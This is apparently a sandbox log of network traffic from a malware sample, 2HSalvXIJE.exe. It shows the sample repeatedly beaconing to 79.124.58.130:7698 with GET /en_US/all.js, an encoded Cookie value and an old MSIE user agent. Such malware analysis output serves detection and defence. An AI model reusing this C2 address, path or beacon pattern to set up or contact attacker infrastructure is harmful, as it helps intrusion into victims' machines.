Oct 23, 2024 17:26:56.822954893 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:57.723676920 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49789	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:57.908837080 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:58.789858103 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49790	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:58.916980028 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:59.808693886 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	49791	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:59.933952093 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:00.825464964 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	49792	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:00.948488951 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:01.841455936 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	49793	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:01.963418961 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:02.863456011 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	49794	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:03.319458961 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:04.189384937 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	49795	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:04.308532000 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:05.200920105 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	49796	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:05.323877096 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:06.224095106 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	49797	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:06.339885950 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:07.227108002 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	49798	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:07.359879971 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:08.266129971 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	49799	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:08.387722015 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:09.268672943 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	49800	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:09.401104927 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:10.322798014 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	49801	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:10.449068069 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:11.345318079 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	49802	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:11.480429888 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:12.369174957 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	49803	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:12.480401993 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:13.370044947 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	49804	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:13.496263981 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:14.388586998 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	49805	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:14.541225910 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:15.432670116 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	49806	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:15.558916092 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:16.449529886 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	49807	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:16.735955000 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:17.601372957 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	49808	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:17.716012001 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:18.617615938 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	49809	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:18.761852026 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:19.653677940 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	49810	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:20.023041964 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:20.911457062 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	49811	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:21.029678106 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:21.920099974 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	49812	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:22.058087111 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:22.958053112 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	49813	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:23.074109077 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:23.970263958 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	49814	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:24.098138094 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:24.995201111 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	49815	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:25.121304989 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:26.023601055 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	49816	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:26.170207024 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:27.088759899 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	49817	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:27.227449894 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:28.115751028 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	49818	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
